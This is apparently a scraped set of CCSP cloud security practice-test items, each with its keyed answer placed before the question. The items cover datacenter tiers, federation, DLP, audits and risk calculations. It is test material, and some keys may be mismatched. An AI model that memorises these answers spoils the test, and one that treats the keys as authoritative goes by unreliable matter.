CCSP (ISC)2 Certified Cloud Security Professional official Practice Test (3rd ed.)

Tier 3

You are selecting a datacenter environment to host a cloud application run by your organization. Your primary requirement is that the datacenter must require no shutdowns for equipment maintenance. What is the lowest level of datacenter that would be acceptable under the Uptime Institute tier system?

The cloud customer

In an infrastructure as a service (IaaS) arrangement, who accepts responsibility for securing cloud‐based applications?

Software composition analysis (SCA)

Brenda’s company employs a number of application developers who create software to meet many different business needs. She is embarking on a project to validate the use of verified open source software and is concerned about the unknowing use of software libraries by those developers. Which of the following technologies will best assist with identifying these uses?

Network intrusion detection systems (NIDS)

________ are software or devices that monitor networks for malicious activities or policy violations and produce electronic alerts and/or reports to a management station.

Only employees of Carla’s company with the appropriate security training and access rights.

Carla works for an infrastructure as a service (IaaS) provider. She is analyzing the security settings for the hypervisors used in a multitenant environment. Who should have access to modify settings on those hypervisors?

Public cloud

In which cloud computing model does a customer share computing infrastructure with other customers of the cloud vendor where one customer may not know the other’s identity?

Federation

You work for a government research facility. Your organization often shares data with other government research organizations. You would like to create a single sign‐on experience across the organizations, where users at each organization can sign in with the user ID/authentication issued by that organization, then access research data in all the other organizations. Instead of replicating the data stores of each organization at every other organization (which is one way of accomplishing this goal), you instead want every user to have access to each organization’s specific storage resources.

What is the term for this kind of arrangement?

Data loss prevention (DLP) systems

Paul’s organization maintains protected health information that is regulated under HIPAA. He would like to add a new security control capable of detecting when employees attempt to remove this sensitive information from his organization’s systems and networks, either intentionally or unintentionally. What security control would best meet his needs?

Off‐site storage

Which of the following is not an essential element defining cloud computing?

Tabletop exercise

Justin recently participated in a disaster recovery plan test where the team sat together and discussed the response to a scenario but did not actually activate any disaster recovery controls. What type of test did he participate in?

ISO 27017

Tonya is employed by a cloud service provider and is responsible for evaluating the provider’s security program. What ISO standard can best help her ensure that her organization has a robust set of security controls in place?

The data is safe only if data from the tokenization process was secure.

Katie’s organization recently suffered a data breach and exposed a database containing student records. The records contained no identifying information other than tokenized student ID numbers. Which of the following statements most accurately represents how Katie should feel about the exposure of these records?

Purchase uninterruptible power supplies (UPSs) from different vendors.

Bob is designing a datacenter to support his organization, a financial services firm. Which of the following actions would best enhance Bob’s efforts to create resiliency in the datacenter?

EAL4

Under the Common Criteria, which one of the following EAL levels indicates that a system has been methodically designed, tested, and reviewed?

Honeypot

A(n) ______________ consists of a computer, data, or a network site that appears to be part of a network but is actually isolated and monitored. It also appears to contain data or resources of value that are in fact fake.

Transport layer security (TLS)

Rusty is evaluating the security of a web‐based SaaS application and wants to verify that the site provides strong encryption between the web server and the client. What is the most common way to achieve this goal?

SOC 2

You operate a cloud service and would like a report that confirms the effectiveness of your security controls and provides significant detail of control gaps that you can use for remediation. What type of audit should you conduct?

Customers, Regulators, Partners

Adam’s organization recently experienced a security breach that affected customer data. Which one of the following stakeholder groups might Adam be required to inform?

Content filtering

An application programming interface (API) gateway can typically offer all of the following capabilities except _________________.

GPS

When logging information about an internet user’s location, what source provides the most accurate physical location data?

Hardware security module

What type of device is designed to safely store and manage encryption keys?

The client

The Transport Layer Security (TLS) protocol creates a secure communications channel over public media (such as the internet). In a typical TLS session, who initiates the protocol?

IaaS

In what cloud computing service model is the customer responsible for installing and maintaining the operating system?

37.5 percent

Please refer to the following scenario:

Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.

After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.

Based on the information in this scenario, what is the exposure factor for the effect of a fire on the Roscommon Cloud Solutions datacenter?

0.02

Please refer to the following scenario:

Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.

After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.

Based on the information in this scenario, what is the annualized rate of occurrence for a fire at the Roscommon Cloud Solutions datacenter?

15,000

Please refer to the following scenario:

Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.

After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.

Based on the information in this scenario, what is the annualized loss expectancy for a fire at the Roscommon Cloud Solutions datacenter?

Coordinating multiple providers that might have relevant records

What is the most significant barrier to eDiscovery efforts in organizations that make heavy use of many different cloud services?

Encryption

David’s organization is preparing to adopt an information rights management tool. What IRM capability focuses on securing data sent by the system while it is in transit over a network?

The idea of identifying specific points of vulnerability and then implementing countermeasures to protect or thwart those points from successful exploitation

Which of the following best describes threat modeling?

Fires in power supplies

Gary is concerned that the environmental controls in his organization’s datacenter may not be effectively controlling humidity. Which of the following circumstances would not commonly result from humidity issues?

Tokenization

Which of the following mechanisms cannot be used by a data loss prevention (DLP) solution to detect the presence of data?

Hashing

Gabriel’s organization maintains a system of voting records. The system uses SHA3 to obscure the contents of sensitive records. What data obfuscation technique is this system using?

SOC 3

Which Statement on Standards for Attestation Engagements (SSAE) 18 report is purposefully designed for public release (for instance, to be posted on a company’s website)?

It must be on a distinct, isolated management network (virtual local area network [VLAN]).

Which of the following is a true statement about the virtualization management toolset?

PaaS

You are the IT director for a small contracting firm. Your company is considering migrating to a cloud production environment. Which service model would best fit your needs if you wanted an option that reduced the chance of vendor lock‐in but also did not require the highest degree of administration by your own personnel?

Rapid elasticity

You are the data manager for a retail company; you anticipate a much higher volume of sales activity in the final quarter of each calendar year than the other quarters. In order to handle these increased transactions, and to accommodate the temporary sales personnel you will hire for only that time period, you consider augmenting your internal, on‐premises production environment with a cloud capability for a specific duration, and will return to operating fully on‐premises after the period of increased activity. Which facet of cloud computing is most important for making this possible?

The data owner

Which one of the following individuals is typically responsible for making high‐level data classification decisions for an organization?

Cross‐site scripting

Brad is assisting with the implementation of a cloud‐based SaaS solution where users can post content that is viewed by other users. He is concerned that users might store executable content on the site that then might be executed automatically by the browsers of other site visitors. What type of vulnerability would permit this attack?

Wait three weeks for additional data before making a final decision.

You are the security manager for an online marketing company. Your company has recently migrated to a cloud production environment and has deployed a number of new cloud‐based protection mechanisms offered by both third parties and the cloud provider, including data loss prevention (DLP) and security information and event management (SIEM) solutions.

After one week of operation, your security team reports an inordinate amount of time responding to potential incidents that have turned out to only be false‐positive reports. Management is concerned that the cloud migration was a bad idea and that it is too costly in terms of misspent security efforts. What do you recommend?

Customers

Which one of the following stakeholders is most likely to demand communication about service outages for a cloud service provider?

Logical design phase

Which is the part of the SDLC in which all functional features of the system chosen for development in analysis are described independently of any computer platform?

Health Insurance Portability and Accountability Act (HIPAA)

A group of clinics decides to create an identification federation for their users (medical providers and clinicians). In this federation, all of the participating organizations would need to be in compliance with what U.S. federal regulation?

Hybrid cloud

You are the data manager for a retail company; you anticipate a much higher volume of sales activity in the final quarter of each calendar year than the other quarters. In order to handle these increased transactions, and to accommodate the temporary sales personnel you will hire for only that time period, you consider augmenting your internal, on‐premises production environment with a cloud capability for a specific duration, and will return to operating fully on‐premises after the period of increased activity. Which deployment model best describes this type of arrangement?

uniform resource identifiers (URIs)

How does representational state transfer (REST) make web service requests?

Information Technology Infrastructure Library (ITIL)

Which of the following best describes a set of practices that focus on aligning IT services with business needs?

Block storage

What type of cloud storage is typically used to provide disk volumes for use with virtual server instances that will store important long‐term data?

statement of work (SOW)

Lisa is working to develop a long‐term relationship with a consulting firm that will assist in her organization’s cloud migration. She has a contract in place that governs the terms of many different projects and would like to create a document that will describe one specific new project. What type of document should she create?

Multitenancy

Full isolation of user activity, processes, and virtual network segments in a cloud environment is incredibly important because of risks due to _________________.

The relying party is the service provider and they would consume the tokens generated by the identity provider.

In a federated environment, who is the relying party, and what do they do?

Volume encryption

Christine is concerned about the risk that another customer will be able to access sensitive data elements stored in her organization’s database in a multitenant public cloud environment. What control would best mitigate this risk?

Inert gas

Which one of the following fire suppression systems is least likely to damage sensitive electronic equipment in a datacenter?

Portability

You are the security manager for a data analysis company. Your senior management is considering a cloud migration in order to use the greater capabilities of a cloud provider to perform calculations and computations. Your company wants to ensure that neither the contractual nor the technical setup of the cloud service will affect your data sets in any way so that you are not locked into a single provider.

Which of the following criteria will probably be most crucial for your choice of cloud providers?

FIPS 140‐2

Which one of the following standards is most likely to contain detailed technical requirements for a hardware security module (HSM) used in a cloud environment?

Enhanced user experience

Which of the following is not a reason for conducting audits?